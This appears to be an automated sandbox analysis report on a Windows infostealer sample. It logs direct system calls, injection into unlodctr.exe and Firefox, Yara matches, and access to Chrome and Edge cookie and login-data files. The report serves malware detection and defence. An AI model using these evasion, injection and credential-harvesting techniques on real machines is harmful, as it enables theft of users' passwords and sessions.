Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0BBE mov eax, dword ptr fs:[00000030h] 4_2_019E0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0BBE mov eax, dword ptr fs:[00000030h] 4_2_019E0BBE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0BCD mov eax, dword ptr fs:[00000030h] 4_2_019D0BCD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0BCB mov eax, dword ptr fs:[00000030h] 4_2_019F0BCB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5CBF0 mov eax, dword ptr fs:[00000030h] 4_2_01A5CBF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEBFC mov eax, dword ptr fs:[00000030h] 4_2_019FEBFC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EBD0 mov eax, dword ptr fs:[00000030h] 4_2_01A7EBD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98B28 mov eax, dword ptr fs:[00000030h] 4_2_01A98B28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98B28 mov eax, dword ptr fs:[00000030h] 4_2_01A98B28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEB20 mov eax, dword ptr fs:[00000030h] 4_2_019FEB20
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEB20 mov eax, dword ptr fs:[00000030h] 4_2_019FEB20
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CCB7E mov eax, dword ptr fs:[00000030h] 4_2_019CCB7E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84B4B mov eax, dword ptr fs:[00000030h] 4_2_01A84B4B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84B4B mov eax, dword ptr fs:[00000030h] 4_2_01A84B4B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A78B42 mov eax, dword ptr fs:[00000030h] 4_2_01A78B42
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66B40 mov eax, dword ptr fs:[00000030h] 4_2_01A66B40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66B40 mov eax, dword ptr fs:[00000030h] 4_2_01A66B40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9AB40 mov eax, dword ptr fs:[00000030h] 4_2_01A9AB40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EB50 mov eax, dword ptr fs:[00000030h] 4_2_01A7EB50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26AA4 mov eax, dword ptr fs:[00000030h] 4_2_01A26AA4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4A80 mov eax, dword ptr fs:[00000030h] 4_2_01AA4A80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08A90 mov edx, dword ptr fs:[00000030h] 4_2_01A08A90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8AA0 mov eax, dword ptr fs:[00000030h] 4_2_019D8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8AA0 mov eax, dword ptr fs:[00000030h] 4_2_019D8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0AD0 mov eax, dword ptr fs:[00000030h] 4_2_019D0AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0AAEE mov eax, dword ptr fs:[00000030h] 4_2_01A0AAEE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0AAEE mov eax, dword ptr fs:[00000030h] 4_2_01A0AAEE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04AD0 mov eax, dword ptr fs:[00000030h] 4_2_01A04AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04AD0 mov eax, dword ptr fs:[00000030h] 4_2_01A04AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA24 mov eax, dword ptr fs:[00000030h] 4_2_01A0CA24
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA38 mov eax, dword ptr fs:[00000030h] 4_2_01A0CA38
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F4A35 mov eax, dword ptr fs:[00000030h] 4_2_019F4A35
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F4A35 mov eax, dword ptr fs:[00000030h] 4_2_019F4A35
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEA2E mov eax, dword ptr fs:[00000030h] 4_2_019FEA2E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5CA11 mov eax, dword ptr fs:[00000030h] 4_2_01A5CA11
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0A5B mov eax, dword ptr fs:[00000030h] 4_2_019E0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0A5B mov eax, dword ptr fs:[00000030h] 4_2_019E0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EA60 mov eax, dword ptr fs:[00000030h] 4_2_01A7EA60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4CA72 mov eax, dword ptr fs:[00000030h] 4_2_01A4CA72
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4CA72 mov eax, dword ptr fs:[00000030h] 4_2_01A4CA72
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A06DA0 mov eax, dword ptr fs:[00000030h] 4_2_01A06DA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98DAE mov eax, dword ptr fs:[00000030h] 4_2_01A98DAE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98DAE mov eax, dword ptr fs:[00000030h] 4_2_01A98DAE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4DAD mov eax, dword ptr fs:[00000030h] 4_2_01AA4DAD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov ecx, dword ptr fs:[00000030h] 4_2_01A0CDB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov eax, dword ptr fs:[00000030h] 4_2_01A0CDB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov eax, dword ptr fs:[00000030h] 4_2_01A0CDB1
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryInformationProcess: Direct from: 0x77392C26
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtResumeThread: Direct from: 0x77392FBC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtWriteVirtualMemory: Direct from: 0x7739490C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateUserProcess: Direct from: 0x7739371C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtAllocateVirtualMemory: Direct from: 0x77392BFC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQuerySystemInformation: Direct from: 0x77392DFC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtReadFile: Direct from: 0x77392ADC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtDelayExecution: Direct from: 0x77392DDC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtProtectVirtualMemory: Direct from: 0x77387B2E
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtWriteVirtualMemory: Direct from: 0x77392E3C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateMutant: Direct from: 0x773935CC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtResumeThread: Direct from: 0x773936AC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtMapViewOfSection: Direct from: 0x77392D1C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenKeyEx: Direct from: 0x77392B9C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationProcess: Direct from: 0x77392C5C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtProtectVirtualMemory: Direct from: 0x77392F9C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtNotifyChangeKey: Direct from: 0x77393C2C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryInformationToken: Direct from: 0x77392CAC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateFile: Direct from: 0x77392FEC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenFile: Direct from: 0x77392DCC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtTerminateThread: Direct from: 0x77392FCC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtDeviceIoControlFile: Direct from: 0x77392AEC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryValueKey: Direct from: 0x77392BEC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQuerySystemInformation: Direct from: 0x773948CC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryVolumeInformationFile: Direct from: 0x77392F2C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtAllocateVirtualMemory: Direct from: 0x773948EC
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenSection: Direct from: 0x77392E0C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenKeyEx: Direct from: 0x77393C9C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationThread: Direct from: 0x773863F9
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtClose: Direct from: 0x77392B6C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationThread: Direct from: 0x77392B4C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtReadVirtualMemory: Direct from: 0x77392E8C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateKey: Direct from: 0x77392C6C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryAttributesFile: Direct from: 0x77392E6C
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: execute and read and write
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\SysWOW64\unlodctr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: read write
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\unlodctr.exe Thread register set: target process: 6952
Source: C:\Windows\SysWOW64\unlodctr.exe Thread APC queued: target process: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.2c49a04.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed7478.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed4448.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c49a04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed5460.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c0860c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2319668431.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.2c49a04.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed7478.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed4448.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c49a04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed5460.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c0860c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2319668431.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
